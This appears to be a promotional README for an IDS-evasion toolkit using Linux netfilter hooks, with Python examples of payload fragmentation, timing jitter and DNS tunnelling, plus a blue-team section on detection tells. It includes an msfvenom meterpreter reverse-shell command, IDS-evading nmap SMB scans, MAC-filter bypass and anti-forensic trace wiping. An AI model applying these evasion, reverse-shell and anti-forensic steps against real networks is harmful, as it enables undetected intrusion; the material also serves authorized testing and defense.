Flea Flicker NetFilter: Network Evasion Toolkit

Flea Flicker NetFilter

IDS blocks your scans. ML detects your payloads. Behavioral analysis flags your timing. Your pentest is over before it starts.

Flea Flicker manipulates packets at kernel level—before they hit the network, before IDS sees them. Netfilter hooks. Fragment payloads. Randomize timing. Impersonate protocols. Traffic is shaped to look like legitimate sessions, so signature and timing detections have less to match on. Manual control over packet behavior. Not automated evasion. Not script kiddie tools.

What It Does

Deep Packet Inspection Evasion

IDS reads packet contents. Pattern matching catches exploits. Signature detection blocks payloads. Flea Flicker fragments your attack across multiple packets: encrypt at the application layer before the network layer, insert random padding between fragments, reassemble only at destination. Two things follow from that design. The bytes on the wire are no longer the exploit, so the far end needs a cooperating receiver (a stager or relay) that knows the framing, strips the padding and decrypts; an unmodified target service would just receive garbage. And fragmentation on its own buys nothing against Snort or Suricata, which reassemble IP fragments and TCP streams before matching; it is the padding and the encryption that break the signature, not the split.

Normal Metasploit payload:
[TCP Header][Exploit Code]
↓ IDS sees exploit signature, blocks

Flea Flicker:
[TCP Header][Fragment 1 + Padding]
[TCP Header][Fragment 2 + Padding]
[TCP Header][Fragment 3 + Padding]
↓ IDS reassembles the stream, finds no contiguous signature, allows
↓ Cooperating receiver on target strips padding, reassembles exploit
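
To make the design concrete, here is an added Python example (not Flea Flicker code; the 2-byte length-prefixed record framing and the sample payload are assumptions made for illustration) that segments a payload, wraps each piece in random padding, reassembles it the way a cooperating receiver would, and checks what a packet-at-a-time matcher and a stream-reassembling matcher each see:

```python
"""Segment a payload, pad it, reassemble it, and compare what a packet-at-a-time
matcher and a stream-reassembling matcher see.  Added example for this page, not
Flea Flicker code: the 2-byte length-prefixed record framing and the sample
payload are assumptions made for illustration."""
import random
import struct

# Constructed stand-in for the byte pattern an IDS signature would match on.
SIGNATURE = b"\x90\x90\x90\xcc"
PAYLOAD = b"GET /" + SIGNATURE + b" HTTP/1.1\r\n"


def fragment(payload: bytes, size: int) -> list[bytes]:
    """Plain segmentation: the payload cut into `size`-byte pieces, nothing added."""
    return [payload[i:i + size] for i in range(0, len(payload), size)]


def pad_records(chunks: list[bytes], max_pad: int, seed: int) -> list[bytes]:
    """Wrap each chunk as [u16 chunk len][chunk][u16 pad len][1..max_pad random bytes].
    Assumed framing; a real build would encrypt the chunk before framing it."""
    rng = random.Random(seed)
    records = []
    for chunk in chunks:
        pad = rng.randbytes(rng.randint(1, max_pad))
        records.append(struct.pack(">H", len(chunk)) + chunk
                       + struct.pack(">H", len(pad)) + pad)
    return records


def reassemble(stream: bytes) -> bytes:
    """Cooperating receiver: walk the records, keep the chunks, drop the padding."""
    out, pos = bytearray(), 0
    while pos + 2 <= len(stream):
        (clen,) = struct.unpack_from(">H", stream, pos)
        out += stream[pos + 2:pos + 2 + clen]
        (plen,) = struct.unpack_from(">H", stream, pos + 2 + clen)
        pos += 4 + clen + plen
    return bytes(out)


def inspector_sees_signature(packets: list[bytes], stream_reassembly: bool) -> bool:
    """Per-packet matching vs. matching on the reassembled stream.  Snort and
    Suricata do the latter by default, so the per-packet case is the weak one."""
    if stream_reassembly:
        return SIGNATURE in b"".join(packets)
    return any(SIGNATURE in p for p in packets)


if __name__ == "__main__":
    plain = fragment(PAYLOAD, 3)
    padded = pad_records(plain, max_pad=16, seed=7)
    print("plain,  per-packet matcher :", inspector_sees_signature(plain, False))
    print("plain,  stream matcher     :", inspector_sees_signature(plain, True))
    print("padded, stream matcher     :", inspector_sees_signature(padded, True))
    print("raw bytes == payload       :", b"".join(padded) == PAYLOAD)
    print("receiver reassembles       :", reassemble(b"".join(padded)) == PAYLOAD)
```

Plain segmentation defeats only the per-packet matcher; once the stream is reassembled the signature is back. Padded records defeat the stream matcher too, but the joined bytes are no longer the payload, which is why the target needs the reassembler. Encrypting each chunk before framing (omitted here) removes the remaining risk that a chunk happens to contain a whole signature.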

Protocol Impersonation

Unusual protocols get flagged. Port scans detected immediately. Make attack traffic look like legitimate services. The wrapping is only removed by a Flea Flicker endpoint at the other end, so it hides the leg between you and a host you control (a pivot, an implant's C2 channel), not a probe sent directly to an uncooperative target: an SMB probe must still arrive at port 445 as SMB or the target will not answer. The wrapper also has to be real enough to parse. Suricata's app-layer detection and TLS fingerprinting (JA3) flag a "TLS-like" stream on 443 that is not valid TLS as a protocol anomaly, which is louder than the scan was.

Nmap scan on port 445:
→ SMB enumeration detected, blocked

Flea Flicker wrapped Nmap:
→ Attacker-to-pivot packets look like HTTPS traffic on 443
→ Payload hidden in TLS-like record structure
→ IDS on that path sees "normal web browsing"
→ Pivot unwraps and sends the real SMB probes to 445
→ Scan proceeds; only the inside leg is visible as SMB

Timing Randomization

Behavioral analysis detects patterns. Regular intervals mean automated scanning. You get caught. Flea Flicker randomizes delays between packets (0.1s to 5s), injects jitter to mimic human interaction, and throttles volume to stay under detection thresholds. This degrades time-series analysis, rate limiting, and correlation engines that key on temporal clustering. Note what it does not do: a uniform 0.1 to 5 s gap is itself a distribution, and a detector that models inter-arrival times sees neither the fixed interval of a scanner nor the bursty, heavy-tailed gaps of a person. The throttle is the part that matters against rate-based alerts, and it only works if you know the threshold.
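
An added Python example (not Flea Flicker code; the 60 s window and the per-window cap are assumed values, the 0.1 to 5 s range is the page's) of both halves of this: generating a send schedule with uniform jitter and a volume cap, and the sliding-window rate check and inter-arrival statistic a detector would compute on it:

```python
"""Jittered send schedule with a volume cap, and the checks a detector runs on it.
Added example for this page, not Flea Flicker code.  The 0.1 to 5 s range is the
page's; the 60 s window and the per-window cap are assumed values."""
import bisect
import random
import statistics


def jittered_schedule(n: int, lo: float, hi: float, max_per_window: int,
                      window: float, seed: int) -> list[float]:
    """Send times for n packets: uniform random gaps in [lo, hi], then each send
    is pushed back until no `window`-second span (t - window, t] holds more
    than max_per_window sends.  Seeded so runs are reproducible."""
    rng = random.Random(seed)
    times: list[float] = []
    t = 0.0
    for _ in range(n):
        t += rng.uniform(lo, hi)
        # Throttle: with max_per_window sends already in the window ending at t,
        # wait until the oldest of them has aged out of it (small margin so it
        # is strictly outside despite floating-point rounding).
        if len(times) >= max_per_window and t - times[-max_per_window] < window:
            t = times[-max_per_window] + window + 1e-6
        times.append(t)
    return times


def peak_rate(times: list[float], window: float) -> int:
    """Rate-limit detector: the most sends seen in any (t - window, t] span."""
    peak = 0
    for i, t in enumerate(times):
        first = bisect.bisect_right(times, t - window)  # first send newer than t - window
        peak = max(peak, i - first + 1)
    return peak


def gap_cv(times: list[float]) -> float:
    """Coefficient of variation of inter-arrival gaps: 0 for a fixed-interval
    scanner, about 0.55 for uniform jitter on [0.1, 5], larger and heavy-tailed
    for human-driven traffic."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    return statistics.pstdev(gaps) / statistics.mean(gaps)


if __name__ == "__main__":
    capped = jittered_schedule(200, 0.1, 5.0, max_per_window=20, window=60.0, seed=3)
    uncapped = jittered_schedule(200, 0.1, 5.0, max_per_window=10**9, window=60.0, seed=3)
    print("peak per 60 s, jitter only :", peak_rate(uncapped, 60.0))
    print("peak per 60 s, throttled   :", peak_rate(capped, 60.0))
    print("gap CV, fixed 1 s scanner  :", round(gap_cv([float(i) for i in range(200)]), 3))
    print("gap CV, throttled jitter   :", round(gap_cv(capped), 3))
```

Jitter alone leaves the average rate where it was (about 23 sends a minute at these settings), so a per-minute threshold of 20 still fires; the cap is what keeps it quiet. The CV line is the blue-team side: a scanner's 0 and a uniform jitter's 0.55 are both signatures once you look at the gap distribution rather than the mean.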

MAC Address Rotation

Network access control, MAC filtering, device tracking—they know your hardware. Flea Flicker rotates MAC every N packets, spoofs the vendor OUI to look like different hardware, and maintains DHCP lease across rotations. Use case: bypass MAC filtering on WiFi networks during authorized pentest. Caveats: keeping the lease means keeping the IP while the switch and the gateway's ARP cache relearn the new MAC, so expect a short gap per rotation, and a DHCP server that binds leases to the client hardware address will treat each rotation as a new client. A MAC allow-list is all this bypasses; 802.1X/EAP authenticates the supplicant, not the address, and a rotating MAC there is a new unauthenticated device every N packets.

Traffic Mimicry

Volume analysis spots anomalies. Attack traffic does not look like normal users. Hide in normal traffic by generating decoy traffic alongside real attacks, matching volume patterns to office hours and usage spikes, and mixing protocols (HTTP, DNS, SMTP). The real attack disappears into noise that looks like a normal user. The decoys add to your total volume rather than replacing it, so size them against the baseline of the host you are impersonating, not against the attack.

Technical Implementation

#include <linux/module.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <net/net_namespace.h>

/* Runs in softirq context, so it cannot sleep: timing delays are not injected
 * here; hold the skb (NF_STOLEN) and transmit it later from a workqueue. */
static unsigned int packet_handler(void *priv, struct sk_buff *skb,
                                   const struct nf_hook_state *state)
{
    /* Fragment payload, add encryption layer, spoof headers */
    return NF_ACCEPT; /* send modified packet */
}
/* Intercept outbound IPv4 after routing, ahead of every other hook */
static struct nf_hook_ops nfho_out = {
    .hook = packet_handler, .pf = NFPROTO_IPV4,
    .hooknum = NF_INET_POST_ROUTING, .priority = NF_IP_PRI_FIRST,
};
/* nf_register_hook() was removed in 4.13; 4.15+ registers per network namespace */
static int __init ff_init(void) { return nf_register_net_hook(&init_net, &nfho_out); }
static void __exit ff_exit(void) { nf_unregister_net_hook(&init_net, &nfho_out); }
module_init(ff_init);
module_exit(ff_exit);
MODULE_LICENSE("GPL");

[Application] → [Payload]
      ↓
[Flea Flicker Interceptor]
      ↓
[Fragment + Encrypt + Obfuscate + Time Delay]
      ↓
[Modified Packets] → [Network]

Real-World Scenario

Objective: enumerate SMB shares on a corporate network with IDS deployed.

Without Flea Flicker:

$ nmap -p 445 --script smb-enum-shares 10.0.0.0/24
→ IDS detects: Port scan + SMB enumeration
→ Alert triggered
→ IP blocked
→ Pentest detected

With Flea Flicker:

$ flea-flicker --mode ghost --protocol https \
  nmap -p 445 --script smb-enum-shares 10.0.0.0/24

→ Packets fragmented across 20-second window
→ Traffic appears as HTTPS on port 443
→ Timing randomized (looks like browsing)
→ IDS sees: Normal web traffic
→ Scan completes undetected
→ Pentest proceeds

Read the second run with the constraint from the Protocol Impersonation section in mind: the HTTPS appearance covers the hop from your box to whatever unwraps it. The 254 targets still receive SMB on 445, so against a sensor watching the target segment what changes is the timing and the fragmentation, not the protocol, and the per-host rate of SMB probes is what you are trying to keep under the alert threshold.

Pentest Integration

Metasploit payload wrapping:

# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.0.0.1 LPORT=443 -f raw > payload.bin

# Wrap with Flea Flicker
flea-flicker --wrap payload.bin \
  --protocol dns --fragment-size 64 --delay 0.5-3.0

# Deliver wrapped payload
# A stager on the target pulls the fragments over DNS and reassembles them;
# the raw payload cannot unwrap itself
# IDS sees DNS queries to your zone. Binary has to be encoded into labels of
# at most 63 bytes, so a 64-byte fragment spans more than one label and the
# names come out long and high-entropy, which is exactly what DNS-tunnel
# detection keys on. Keep fragments short and queries sparse.
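
An added Python example (not Flea Flicker code) of what carrying 64-byte fragments in DNS names involves on both ends, and the check a detector runs against the names. The base32 encoding, the `<seq>.<data labels>.<zone>` layout, the zone name `cdn-updates.example`, the constructed sample payload and the length and entropy thresholds are all assumptions made for illustration:

```python
"""Payload fragments carried in DNS query names, and the detector check for them.
Added example for this page, not Flea Flicker code: the base32 encoding, the
<seq>.<data labels>.<zone> layout, the zone name, the sample payload and the
detection thresholds are assumptions made for illustration."""
import base64
import math
import random
from collections import Counter

ZONE = "cdn-updates.example"   # assumed attacker-controlled zone
LABEL_MAX = 63                 # RFC 1035 label limit
NAME_MAX = 253                 # RFC 1035 name limit, presentation form
SAMPLE_PAYLOAD = random.Random(1).randbytes(256)   # constructed stand-in for payload.bin


def encode_fragments(payload: bytes, fragment_size: int) -> list[str]:
    """One query name per fragment.  Base32 is used because DNS is case-insensitive
    and resolvers may flip label case; it expands 5 bytes to 8 chars, so a 64-byte
    fragment becomes 103 chars and needs two labels."""
    names = []
    for seq, i in enumerate(range(0, len(payload), fragment_size)):
        data = base64.b32encode(payload[i:i + fragment_size]).decode().rstrip("=").lower()
        labels = [data[j:j + LABEL_MAX] for j in range(0, len(data), LABEL_MAX)]
        name = ".".join([f"{seq:04x}", *labels, ZONE])
        if len(name) > NAME_MAX:
            raise ValueError(f"fragment_size {fragment_size} does not fit in one name")
        names.append(name)
    return names


def decode_fragments(names: list[str]) -> bytes:
    """Receiver side, the authoritative server for ZONE: strip the zone, order by
    sequence number (queries arrive out of order), restore padding, decode."""
    frags = {}
    for name in names:
        seq, *labels = name[: -len(ZONE) - 1].split(".")
        data = "".join(labels).upper()
        frags[int(seq, 16)] = base64.b32decode(data + "=" * (-len(data) % 8))
    return b"".join(frags[k] for k in sorted(frags))


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())


def looks_like_tunnel(name: str, max_sub_len: int = 52, min_entropy: float = 3.5) -> bool:
    """Detector heuristic with assumed thresholds: the part of the name below the
    registered domain (approximated here as the last two labels) is long and
    high-entropy.  Real hostnames are short dictionary words; encoded data is neither."""
    sub = "".join(name.split(".")[:-2])
    return len(sub) > max_sub_len and shannon_entropy(sub) > min_entropy


if __name__ == "__main__":
    names = encode_fragments(SAMPLE_PAYLOAD, 64)
    print(len(names), "queries, first:", names[0])
    print("round trip ok:", decode_fragments(names) == SAMPLE_PAYLOAD)
    print("flagged:", [looks_like_tunnel(n) for n in names], looks_like_tunnel("www.example.com"))
```

Every one of the four queries trips the heuristic; the only way under it is fragments short enough that the encoded name stays in the length range of ordinary hostnames, which multiplies the query count and hands the detector a volume signal instead. Real detectors add per-client query rate, NXDOMAIN ratio and TXT/NULL record use to this, so treat the thresholds as a floor, not a target.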

Burp Suite extension:

[Burp Repeater]
     ↓
[Flea Flicker Proxy]
     ↓
[Obfuscated HTTP requests]
     ↓
[Target Web App]

Passive WAF/IDS on the wire sees fragmented, time-delayed requests
Attack may succeed where direct request blocked
A reverse-proxy WAF (ModSecurity on the origin, a CDN WAF) terminates TCP and TLS and inspects the reassembled request, so packet-level fragmentation and delay do nothing there; only application-layer obfuscation reaches it

Nmap evasion:

# Standard aggressive scan (detected immediately)
nmap -A -T4 target.com

# Flea Flicker wrapped (smaller timing footprint; -T2 is already Nmap's "polite" profile)
flea-flicker --mode shadow --timing random \
  nmap -A -T2 target.com

Installation

git clone https://github.com/ghostintheprompt/flea-flicker-netfilter
cd flea-flicker-netfilter
sudo ./install.sh
sudo modprobe flea_flicker
flea-flicker --version

Requires Linux kernel 4.15+ with netfilter support, root access for kernel module loading, and Python 3.8+. Compatible with Kali, ParrotOS, Ubuntu, Debian.

Basic Usage

Ghost Mode (DPI evasion):

flea-flicker --mode ghost [command]
flea-flicker --mode ghost nmap -A target.com

Shadow Mode (MAC rotation + traffic mimicry):

flea-flicker --mode shadow --interface wlan0
# Continuous MAC rotation every 100 packets
# Generates decoy traffic automatically

Protocol Impersonation:

flea-flicker --protocol https nmap -p 445 target.com
flea-flicker --protocol dns [command]

Custom configuration:

flea-flicker --fragment-size 64 \
  --delay 0.5-3.0 \
  --protocol https \
  --mac-rotation 100 \
  [command]

Operational Security

Runs memory-only by default. No logs written, configuration in RAM, minimal disk artifacts.

flea-flicker --cleanup
flea-flicker --emergency-shutdown
flea-flicker --self-destruct 60 [command]

Anti-forensics: clears command history entries, wipes kernel module traces, removes temporary files, resets network state. Loading a kernel module still writes to the kernel ring buffer and the journal, and an auditd or EDR agent on the box records the insmod; the cleanup covers what the tool itself wrote, not those. Check the rules of engagement before using any of this, since clients usually want the attacker-side artifacts retained as evidence.

Why This Exists

Built this after a pentest where the client had deployed ML-based IDS. Standard Nmap was instant detection. Metasploit payloads got blocked immediately. Needed packet manipulation before IDS could analyze anything.

Netfilter hooks at kernel level intercept outbound traffic. Fragment payloads. Randomize timing. Impersonate protocols. IDS sees fragmented, delayed traffic that looks legitimate.

Aimed at signature-based IDS/IPS, behavioral analysis, and timing correlation, within the limits noted above (a cooperating far end, a protocol wrapper that actually parses). Does not help against TLS interception that terminates the session and inspects the plaintext (the wrapper is stripped before inspection), against a defender with full packet capture and the time to look at it (every byte is retained), or against air-gapped networks (there is no path to put packets on).

The technique is to understand how each detection method works and evade it systematically. DPI reads content—fragment it. Timing analysis looks for patterns—randomize them. Protocol detection flags unusual traffic—impersonate legitimate services. Behavioral analysis models normal users—generate decoy traffic that matches.

For Red Teams

This gets past commercial defenses. Test in lab first. Understand the evasion techniques. Do not rely on automation—manual control over packet behavior means you decide fragmentation size, timing delays, protocol impersonation. The tool provides capability. You provide intelligence.

For Blue Teams

Learn these techniques because attackers already use them. Update your signatures. Behavioral analysis alone is not enough—you need multi-layer detection: content, timing, volume, and protocol analysis combined. Look for the tells each evasion leaves: a non-TLS stream on 443, long high-entropy DNS names, inter-arrival gaps that are uniform instead of bursty, a MAC that changes in the middle of a lease.

If a red team can evade your IDS with open-source tools, real attackers already are.


Authorized pentests only. Written permission required. Federal prison is real.

github.com/ghostintheprompt/flea-flicker-netfilter


GhostInThePrompt.com // The factory is a bug. The battlefield is the crash report.